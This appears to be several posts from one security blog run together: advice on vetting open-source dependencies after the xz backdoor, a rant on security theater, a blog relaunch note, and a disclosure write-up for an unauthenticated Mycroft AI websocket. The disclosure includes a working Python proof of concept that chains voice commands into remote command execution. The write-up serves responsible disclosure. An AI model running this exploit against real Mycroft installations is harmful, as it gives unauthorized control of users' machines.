Since you are using a thirdy-part source for your supply chain, you have to trust someone at one point or another. When talking about supply chain security the reccomendations are always the same: pin the hashes and use signature verification. This will work as long as you have scenarios like a malicious attacker compromising the dependency CICD and pushing a malicious build, account compromissions etc.

But what can you do if all of a sudden, trusted maintainers goes rogue?

As a standard user, unless you want (and are able to) code review every single commit from every single piece of software your OS interact with: pretty much nothing.

On the other hand, developers and repository owners should really increase controls on their supply chain and include strict metrics to exclude high risk packages. One of the biggest gimmicks of Open Source security is people beliving that since the source code is available the code magically became safe.

One critical factor often overlooked is the assumption that having access to the source code automatically translates into a larger pool of eyes scrutinizing it for vulnerabilities.

The effectiveness of this review process depends on the level of community engagement and the expertise of those inspecting the code, and usually is not much at all. Many projects receive minimal attention from developers, with only a handful of individuals actively contributing or reviewing code changes. As a result, vulnerabilities (intentional or not) may go unnoticed for extended periods, posing significant security risks to users.

Every time a discussion like that appears I always remember the InfosectCBR’s “Month of Kali” where Silvio Cesare spent a month popping vulnerabilities on Kali Linux software.

But which factors could contribute on minimizing the risks?

4.2 GitHub Stats

Just to be clear from the beginning: No, you can’t trust this kind of metrics.

There is an hidden market of buying and selling GitHub stats like stars, forks etc. You can read a nice article here: https://dagster.io/blog/fake-stars

4.3 Community Engagement

Evaluate the size and engagement of the community surrounding the project.

A large and active community can provide additional eyes for reviewing code, reporting bugs, and addressing security issues promptly. xz/liblzma had litterally 2 maintainers and one was the malicious actor.

4.4 Funding and Support

Consider whether the project receives financial support or sponsorship from reputable organizations. Projects with dedicated funding tend to have more resources available for security audits and ongoing maintenance. And also are less likely to be completely abandoned.

4.5 SDLC

A good portion of the evaluation should also focus on the SDLC to e ensure security (and quality in general) gates are correcly implemented, approvals on PRs are mandatory and there are healthy practices in place to prevent one single contributor to push malicious code without approval.

Also take in considerations that we are humans, and we make errors. Passing a code review doesn’t mean the code is safe, as I said before: there is no real solution, just ways to decrease the probablity for the bad stuff to happen.

4.6 Enterprise vs Individual

This is a controversial topic because there are projects that are maintained by individuals that are well structured but usually relying on (large) enterprise projects will ensure their SDLC best practices are followed, money are keeping the project alive, and a big company is less likely to go all in and backdoor their project on purpose. Again, this just increases the probablity, don’t take it for granted ;)

4.7 Recursive controls

The project you are including will probably also have dependencies, make sure the same scrutiny is applied by the project maintainers on their supply chain to avoid indirect compromission.

5 Conclusion

The xz backdoor is yet another case of supply chain hijacking, but this time with way more complexity and effort behind it.

We shound’t blame the current maintainer or the Open Source software: issues like that (intentional or not) are mostly unpatchable because they leverage the human factor that is inreplaceable.

On the other hand we can follow some best practices in picking software to integrate inside our repositories to reduce the chance of this from happening.

6 Resources

• OSS-Security List: https://www.openwall.com/lists/oss-security/2024/03/29/4
• Comprehensive timeline: https://boehs.org/node/everything-i-know-about-the-xz-backdoor
• Compromise link roundup: https://shellsharks.com/xz-compromise-link-roundup
• Obfuscation Analysis: https://gynvael.coldwind.pl/?lang=en&id=782
• Backdoor Analysis: https://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504
• Additional info: https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b
• Visualized timeline: https://infosec.exchange/@fr0gger/112189232773640259

I have seen many companies invest significant time and resources into security measures that have little to no actual effect on security. This is commonly referred to as “security theater”.

1 What is the Security Theatre

Security theater refers to the practice of implementing security measures for the sake of appearances, without any significant impact on actual security. These measures may give the illusion of protection, but in reality, they provide little to no real security benefits.

Organizations often fall into the trap of focusing solely on compliance requirements without considering their actual security needs. Compliance-driven security measures may give the illusion of being protected, but they often fail to address the specific security risks faced by an organization.

Useless compliance can also result in organizations wasting valuable resources on implementing measures that do not have a significant impact on their security posture. This can lead to a situation where an organization is in compliance with regulations, but the security budget is depleted, while their assets are still vulnerable to attacks.

Oh, how I love the smell of compliance in the morning.

An example of Security Theatre is the use of complex passwords that are changed regularly. Although it may seem like a good idea, it can lead to password fatigue and employees using easier-to-remember passwords, which actually undermines security. This is among the reasons why companies like Microsoft, Apple, and Google are moving away from passwords.

Another example of security theatre is implementing security controls that are not properly configured or maintained. For instance, firewalls, IDS and IPS are a common security measure that are often poorly configured or not kept up-to-date with the latest security patches

2 Root cause

Cybersecurity has become the new gold rush, with numerous individuals and organizations seeking to take advantage of the potential financial gains. However, finding skilled personnel to address these security concerns can be challenging, and relying on consultants can lead to a situation where the organization becomes overly dependent on their expertise.

3 Wrapping up

Organizations can protect themselves from the constant security threats by taking a proactive approach. The first step is to gain a thorough understanding of the specific risks they are facing and then implement the necessary measures to mitigate these risks. This includes educating their employees to be aware of potential attacks and how to respond in such situations.

In conclusion, to avoid being caught in the trap of “security theater”, organizations must concentrate on establishing practical security measures and regularly evaluate their effectiveness. Having a well-thought-out response plan in place is also critical in ensuring the protection of the organization’s assets.

Additionally, organizations should cease creating redundant policies that serve no purpose in enhancing the organization’s overall security posture.

Long time no see, uh? Lot of stuff happen since the last post in 2018 on the old blog.

Unfortunately I wasn’t able to write much, both for the lack of time and the impossibility to share what I learned. This post contains an introduction to this new website and how it will work from now on.

First of all, I’m still in Security but moved to Product Security (more on this on a later post but TL;DR: boredom, careeer and growth opportunities, frustration and fear of burnout). Fortunately I still have time and resources on my job to conduct vulnerability research so occasionally I will post about interesting vulnerabilities I found. I would also like to talk about security aspects more related to SDLC, so let’s see how it’ll go.

1 How this blog works

The setup is pretty simple, I’m using hugo to build static pages and publish them on GitHub pages. There is a Github Action running that builds and deploy the pages every time a PR is approved on the main branch.

The theme used is LoveIt, it’s pretty cool and rich of features but has few bugs that need to be fixed; for example, if you are using the blog in Italian you can see that the localization is pretty much fucked up. The theme localization it’s a pretty cool feature but having to rewrite the same post for each language is painful, so I’m thinking about adding the support to DeepL.

Last but not least, the blog got a new logo:

it was generated by Midjourney and means absolutely nothing!

2 The future

What’s next, you ask? Well.. a lot of stuff actually. First of all I need to migrate all the posts from the old blog because I would like to retain an archive. Next I can start writing new posts.

Despite being called appsec.space I would like to talk about different topics, spacing from Application Security to Malware Developmemnt (for learning purposes of course), to productivity setup and generic rants, basically turning this blog into my stream of counciousness.

The next post will probably talk about the Security Theater.

See you then!

1 Introduction

During my journey contributing to open source I was working with my friend Matteo De Carlo on an AUR Package of a really interesting project called Mycroft AI. It’s an AI-powered vocal assistant started with a crowdfunding campaign in 2015 and a more recent one that allowed Mycroft to produce their Mark-I and Mark-II devices. It’s also running on Linux Desktop/Server, Raspberry PI and will be available soon™ on Jaguar F-Type and Land Rover

2 Digging in the source code

While looking at the source code I found an interesting point: here

...
host = config.get("host")
port = config.get("port")
route = config.get("route")
validate_param(host, "websocket.host")
validate_param(port, "websocket.port")
validate_param(route, "websocket.route")

routes = [
        (route, WebsocketEventHandler)
]
application = web.Application(routes, **settings)
application.listen(port, host)
ioloop.IOLoop.instance().start()
...

it defines a websocket server that uses to get instructions from the remote clients (like the Android one). The settings for the websocket server are defined in mycroft.conf

// The mycroft-core messagebus' websocket
  "websocket": {
    "host": "0.0.0.0",
    "port": 8181,
    "route": "/core",
    "ssl": false
},

So there is a websocket server that doesn’t require authentication that by default is exposed on 0.0.0.0:8181/core. Let’s test it 😉

#!/usr/bin/env python

import asyncio
import websockets

uri = "ws://myserver:8181/core"
command = "say pwned"

async def sendPayload():
    async with websockets.connect(uri) as websocket:
        await websocket.send("{\"data\": {\"utterances\": [\""+command+"\"]}, \"type\": \"recognizer_loop:utterance\", \"context\": null}")

asyncio.get_event_loop().run_until_complete(sendPayload())

And magically we have an answer from the vocal assistant saying pwned!

Well, now we can have Mycroft pronounce stuff remotely, but this is not a really big finding unless you want to scare your friends, right?

3 The skills system

Digging deeper we can see that Mycroft has a skills system and a default skill that can install others skills (pretty neat, right?)

How is a skill composed? From what we can see from the documentation a default skill is composed by:

• dialog/en-us/command.dialog contains the vocal command that will trigger the skill
• vocab/en-us/answer.voc contains the answer that Mycroft will pronounce
• requirements.txt contains the requirements for the skill that will be installed with pip
• __int__.py contains the main function of the skill and will be loaded when the skill is triggered

4 What can I do now?

I could create a malicious skill that when triggered runs arbitrary code on the remote machine, but unfortunately this is not possible via vocal command unless the URL of the skill is not whitelisted via the online website. So this is possible but will be a little tricky.

4.1 So I’m done?

Not yet. I found out that I can trigger skills remotely and that is possible to execute commands on a remote machine convincing the user to install a malicious skill. I may have enough to submit a vulnerability report. But maybe I can do a bit better…

5 Getting a remote shell using default skills

We know that Mycroft has some default skills like open that will open an application and others that are whitelisted but not installed. Reading through to the list, I found a really interesting skill called skill-autogui, whose description says Manipulate your mouse and keyboard with Mycroft. We got it!

Let’s try to combine everything we found so far into a PoC:

#!/usr/bin/env python

import sys
import asyncio
import websockets
import time


cmds = ["mute audio"] + sys.argv[1:]
uri = "ws://myserver:8181/core"


async def sendPayload():
    for payload in cmds:
        async with websockets.connect(uri) as websocket:
            await websocket.send("{\"data\": {\"utterances\": [\""+payload+"\"]}, \"type\": \"recognizer_loop:utterance\", \"context\": null}")
            time.sleep(1)

asyncio.get_event_loop().run_until_complete(sendPayload())

Running the exploit with python pwn.py "install autogui" "open xterm" "type echo pwned" "press enter" allowed me to finally get a command execution on a Linux machine.

6 Notes

• open xterm was needed because my test Linux environment had a DE installed, on a remote server the commands will be executed directly on TTY so this step is not nesessary.
• The skill branching had a big change and now some skills are not (yet) available (autogui is one of them) but this is not the real point. Mycroft has skills to interact with domotic houses and other services that can still be manipulated (the lack of imagination is the limit here). The vulnerability lies in the lack of authentication for the ws.

7 Affected devices

All the devices running Mycroft <= ? with the websocket server exposed (Mark-I has the websocket behind a firewall by default)

8 Timeline

• 08/03/2018 Vulnerability found
• 09/03/2018 Vulnerability reported
• 13/03/2018 The CTO answered that they are aware of this problem and are currently working on a patch
• 06/06/2018 The CTO said that they have no problem with the release of the vulnerability and will add a warning to remember the user to use a firewall ¯\_(ツ)_/¯
• 09/06/2018 Public disclosure